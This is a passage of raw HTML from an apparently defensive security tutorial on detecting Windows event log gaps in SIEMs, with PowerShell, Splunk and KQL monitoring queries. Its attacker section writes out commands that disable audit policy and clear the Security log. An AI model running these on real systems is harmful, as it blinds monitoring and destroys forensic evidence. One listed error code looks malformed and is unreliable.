16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$sourceStats = [PSCustomObject]@{</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 
13%, 16%)\"><span class=\"token plain\">    LatestRecordId  = $securityLog.RecordId</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    OldestRecordId  = $oldestEvent.RecordId</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    OldestTimestamp = $oldestEvent.TimeCreated</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    TotalRetained   = $securityLog.RecordId - $oldestEvent.RecordId + 1</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Write-Output \"Source latest RecordId: $($sourceStats.LatestRecordId)\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Write-Output \"Source oldest retained: $($sourceStats.OldestRecordId) at $($sourceStats.OldestTimestamp)\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Write-Output \"Events retained locally: $($sourceStats.TotalRetained)\"</span><br></span></code></pre></div></div>\n<p>Now check what your SIEM has for the same host:</p>\n<div class=\"language-splunk codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-splunk codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">index=wineventlog host=\"DC01\" 
source=\"WinEventLog:Security\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| stats min(EventRecordID) as earliest_in_siem, </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        max(EventRecordID) as latest_in_siem,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        count as total_in_siem</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        by host</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| eval coverage_pct = round((total_in_siem / (latest_in_siem - earliest_in_siem + 1)) * 100, 2)</span><br></span></code></pre></div></div>\n<p>If <code>coverage_pct</code> is substantially below 100%, events in that ID range are missing from your SIEM. The delta between source <code>TotalRetained</code> and SIEM <code>total_in_siem</code> over the same period is your gap count.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"62-the-event-volume-baseline-method\">6.2 The Event Volume Baseline Method<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#62-the-event-volume-baseline-method\" class=\"hash-link\" aria-label=\"Direct link to 6.2 The Event Volume Baseline Method\" title=\"Direct link to 6.2 The Event Volume Baseline Method\" translate=\"no\">​</a></h3>\n<p>A subtler but more scalable approach: establish a baseline of expected event volume per host per event type, then alert on deviations.</p>\n<div class=\"language-splunk codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-splunk codeBlock_bY9V thin-scrollbar\" 
style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">index=wineventlog source=\"WinEventLog:Security\" EventCode=4688 earliest=-7d</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| bucket _time span=1h</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| stats count AS hourly_count BY _time, host</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| streamstats window=168 avg(hourly_count) AS avg_hourly_count BY host</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| eval pct_of_avg = round((hourly_count / avg_hourly_count) * 100, 0)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where pct_of_avg &lt; 50</span><br></span></code></pre></div></div>\n<p>More practically, for a KQL (Microsoft Sentinel) equivalent:</p>\n<div class=\"language-kql codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-kql codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// Detect hosts reporting significantly fewer events than their 7-day average</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// Indicator of agent failure, log overwrite acceleration, or active suppression</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">let lookback = 7d;</span><br></span><span class=\"token-line\" 
style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">let evaluationWindow = 1h;</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">SecurityEvent</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where TimeGenerated &gt; ago(lookback)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where EventID == 4688  // Process creation: high volume, good baseline indicator</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| summarize </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    EventCount = count() </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    by Computer, bin(TimeGenerated, evaluationWindow)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| summarize </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    AvgHourlyCount = avg(EventCount),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    StdDev = stdev(EventCount),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    LastHourCount = take_anyif(EventCount, TimeGenerated &gt; ago(evaluationWindow))</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    by Computer</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where isnotempty(LastHourCount)</span><br></span><span 
class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| extend </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    DropThreshold = AvgHourlyCount * 0.5,  // Alert if below 50% of average</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    PctOfAverage = round((LastHourCount / AvgHourlyCount) * 100, 1)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where LastHourCount &lt; DropThreshold</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where AvgHourlyCount &gt; 10  // Exclude hosts with low baseline (too noisy)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| project Computer, AvgHourlyCount, LastHourCount, PctOfAverage, DropThreshold</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| sort by PctOfAverage asc</span><br></span></code></pre></div></div>\n<p>This query runs every hour. Any host reporting fewer than 50% of its normal process creation events triggers an alert. 
The root cause could be: the machine is off (expected), the agent crashed (fix it), the log is not being collected (configuration issue), or an attacker suppressed logging (respond immediately).</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"63-the-gold-standard-synthetic-event-injection\">6.3 The Gold Standard: Synthetic Event Injection<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#63-the-gold-standard-synthetic-event-injection\" class=\"hash-link\" aria-label=\"Direct link to 6.3 The Gold Standard: Synthetic Event Injection\" title=\"Direct link to 6.3 The Gold Standard: Synthetic Event Injection\" translate=\"no\">​</a></h3>\n<p>The most reliable test: inject known events into a source machine and verify they appear in your SIEM with the correct fields within an expected time window. This is functionally equivalent to a canary test for your collection pipeline.</p>\n<!-- -->\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># On a test or production machine:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Inject a synthetic event into the Application log with a unique identifier</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># that you can search for in your SIEM</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span 
class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$uniqueMarker = \"SIEM-FIDELITY-TEST-$(Get-Date -Format 'yyyyMMdd-HHmmss')-$(New-Guid)\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Write a synthetic event using .NET EventLog class</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$eventSource = \"SIEMFidelityTest\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">if (-not [System.Diagnostics.EventLog]::SourceExists($eventSource)) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    [System.Diagnostics.EventLog]::CreateEventSource($eventSource, \"Application\")</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$log = New-Object System.Diagnostics.EventLog(\"Application\")</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$log.Source = $eventSource</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$log.WriteEntry($uniqueMarker, [System.Diagnostics.EventLogEntryType]::Information, 9999)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Write-Output 
\"Injected marker: $uniqueMarker\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Write-Output \"Now search your SIEM for this string within the next 5 minutes.\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Write-Output \"If absent after 10 minutes, the collection pipeline has a gap.\"</span><br></span></code></pre></div></div>\n<p>You can wrap this into a scheduled task that runs every 4 hours, writes a unique marker, and then a separate SIEM query checks for the marker's arrival within a 15-minute window. Missing markers = pipeline failure = automatic ticket.</p>\n<p>SIEM search to validate the marker arrived (Splunk):</p>\n<div class=\"language-splunk codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-splunk codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">index=wineventlog OR index=windows EventCode=9999 source=\"WinEventLog:Application\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where Message like \"%SIEM-FIDELITY-TEST%\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| rex field=Message \"SIEM-FIDELITY-TEST-(?&lt;marker_id&gt;[^\\s]+)\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| eval latency_seconds = now() - strptime(substr(marker_id, 1, 15), \"%Y%m%d-%H%M%S\")</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| table _time, host, marker_id, 
latency_seconds</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| sort -_time</span><br></span></code></pre></div></div>\n<p>If <code>latency_seconds</code> is consistently over 900 (15 minutes), your collection pipeline is too slow for meaningful detection of fast-moving incidents.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"64-checking-wef-subscription-health\">6.4 Checking WEF Subscription Health<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#64-checking-wef-subscription-health\" class=\"hash-link\" aria-label=\"Direct link to 6.4 Checking WEF Subscription Health\" title=\"Direct link to 6.4 Checking WEF Subscription Health\" translate=\"no\">​</a></h3>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># On the WEC server  view health of all subscriptions and their sources</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">wecutil es  # List all subscriptions</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># For each subscription, check the runtime status of all enrolled sources</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$subscriptions = wecutil es</span><br></span><span 
class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">foreach ($sub in $subscriptions) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Write-Host \"`n=== Subscription: $sub ===\" -ForegroundColor Cyan</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    # Get full subscription config</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    wecutil gs \"$sub\" | Select-String -Pattern \"Name|Status|Enabled|Uri\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    # Get per-source runtime status</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    wecutil gr \"$sub\" | ForEach-Object {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        if ($_ -match \"Source|LastError|NextRetry|LastHeartbeat\") {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            if ($_ -match \"LastError\" -and $_ -notmatch \"LastError: 0x0\") {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                Write-Host $_ -ForegroundColor Red  # Non-zero error = problem</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            } else {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                Write-Host $_</span><br></span><span class=\"token-line\" 
style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span></code></pre></div></div>\n<p>Look for sources with <code>LastError</code> values other than <code>0x0</code>. Common error codes and their meaning:</p>\n<table><thead><tr><th>Error Code</th><th>Meaning</th><th>Action</th></tr></thead><tbody><tr><td>0x0</td><td>OK</td><td>None needed</td></tr><tr><td>0x80070005</td><td>Access denied</td><td>Check WinRM configuration, DACL on subscription</td></tr><tr><td>0x80070776</td><td>Subscription not found</td><td>Re-apply GPO, restart WEC service</td></tr><tr><td>0x803300004</td><td>Connection refused</td><td>WinRM not running on source, firewall blocking 5985</td></tr><tr><td>0x803300005</td><td>Could not connect</td><td>DNS resolution failure, network issue</td></tr><tr><td>0x8033000f</td><td>No more endpoints</td><td>Source machine offline or unreachable</td></tr></tbody></table>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Find all WEF sources that haven't heartbeated in the last 2 hours</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># These are machines with potential coverage 
gaps</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$twoHoursAgo = (Get-Date).AddHours(-2)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$currentSource = $null</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">wecutil gr \"BaselineSubscription\" | ForEach-Object {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $line = $_.Trim()</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    # Under \"EventSources:\" each source is a bare host name; its status fields follow, indented</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    if ($line -and $line -notmatch \":\") {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        $currentSource = $line</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    elseif ($line -match \"^LastHeartbeatTime:\\s*(.+)$\") {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        $hb = $Matches[1].Trim()</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        if ($hb -ne \"N/A\") {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            $heartbeatTime = [DateTime]::Parse($hb)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            if ($heartbeatTime -lt $twoHoursAgo) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                Write-Warning \"STALE: $currentSource last heartbeat: $heartbeatTime\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    elseif ($line -match \"^NextRetryTime:\") {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        # A source the collector is still retrying has no live channel either</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        Write-Warning \"RETRYING: $currentSource ($line)\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span></code></pre></div></div>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"part-7--attackers-exploiting-these-gaps-t1562002\">Part 7  Attackers Exploiting These Gaps: T1562.002<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#part-7--attackers-exploiting-these-gaps-t1562002\" class=\"hash-link\" aria-label=\"Direct link to Part 7  Attackers Exploiting These Gaps: T1562.002\" title=\"Direct link to Part 7  Attackers Exploiting These Gaps: T1562.002\" translate=\"no\">​</a></h2>\n<p>Everything above describes accidental gaps. Sophisticated attackers deliberately exploit them. 
MITRE ATT&amp;CK T1562.002 (Impair Defenses: Disable Windows Event Logging) documents the specific techniques.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"71-disabling-audit-policy-mid-attack\">7.1 Disabling Audit Policy Mid-Attack<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#71-disabling-audit-policy-mid-attack\" class=\"hash-link\" aria-label=\"Direct link to 7.1 Disabling Audit Policy Mid-Attack\" title=\"Direct link to 7.1 Disabling Audit Policy Mid-Attack\" translate=\"no\">​</a></h3>\n<div class=\"language-cmd codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-cmd codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Attacker with local admin rights can disable specific audit subcategories</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: to suppress logging of their specific techniques</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Disable process creation logging before running tools</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">auditpol /set /subcategory:\"Process Creation\" /success:disable /failure:disable</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 
<span class=\"token plain\">:: Disable logon">
16%)\"><span class=\"token plain\">:: Disable logon event logging during lateral movement</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">auditpol /set /subcategory:\"Logon\" /success:disable</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Each change generates Event ID 4719 (audit policy changed), IF the \"Audit Policy Change\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: subcategory is itself still enabled. Most environments don't alert on 4719. Check yours:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">auditpol /get /subcategory:\"Audit Policy Change\"</span><br></span></code></pre></div></div>\n<p>The defense: alert on Event ID 4719 (system audit policy changed). The Security log records this event whenever <code>auditpol</code>, a Group Policy refresh, or any other caller modifies the local audit policy, provided the Audit Policy Change subcategory is enabled. 
It is one of the highest-fidelity indicators of active defense evasion: apart from Group Policy refreshes, which show the computer account as the subject, and planned administrative changes, it has almost no legitimate source.</p>\n<div class=\"language-kql codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-kql codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// KQL: alert on audit policy changes made under a user account rather than by Group Policy</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">SecurityEvent</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where TimeGenerated &gt; ago(24h)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where EventID == 4719</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// SecurityEvent already exposes these EventData fields as columns; EventData itself is raw XML text</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where SubjectUserName !endswith \"$\"  // Exclude machine accounts (GPO application)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| project TimeGenerated, Computer, SubjectUserName, SubjectLogonId, SubcategoryGuid, AuditPolicyChanges</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| sort by TimeGenerated desc</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"72-clearing-the-event-log\">7.2 Clearing the Event Log<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#72-clearing-the-event-log\" class=\"hash-link\" aria-label=\"Direct link to 7.2 Clearing the Event Log\" title=\"Direct link to 7.2 Clearing the Event Log\" translate=\"no\">​</a></h3>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Attacker clears the Security log to destroy evidence</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">wevtutil cl Security   # Generates Event 1102 (audit log cleared) in the Security log itself</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># OR</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Clear-EventLog -LogName Security  # Same result</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Remove-EventLog is more destructive: it deletes a classic log and its registered sources outright</span><br></span><span 
